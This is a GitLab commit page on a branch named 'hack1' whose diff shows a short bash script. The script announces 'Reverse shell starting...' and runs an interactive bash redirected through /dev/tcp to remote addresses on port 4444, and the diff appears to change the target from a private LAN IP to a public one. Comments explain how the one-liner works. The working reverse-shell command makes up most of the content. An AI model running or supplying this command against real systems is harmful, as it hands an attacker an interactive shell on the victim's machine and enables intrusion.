Skip to content
Snippets Groups Projects
Commit 43f7d82e authored by Martinz, David's avatar Martinz, David
Browse files

ad

parent 0fd66cdb
Branches hack1
No related tags found
No related merge requests found
#!/bin/bash
echo "Reverse shell starting..."
bash -i >& /dev/tcp/192.168.178.22/4444 0>&1
bash -i >& /dev/tcp/129.27.238.43/4444 0>&1
# bash -i:
......
#!/bin/bash
echo "Reverse shell starting..."
bash -i >& /dev/tcp/192.168.178.22/4444 0>&1
bash -i >& /dev/tcp/129.27.238.43/4444 0>&1
# bash -i:
# Starts an interactive bash shell
# >& /dev/tcp/192.168.178.22/4444:
# /dev/tcp/192.168.178.22/4444 is a special Linux file that creates a TCP connection to the specified IP address (192.168.178.22) and port (4444).
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment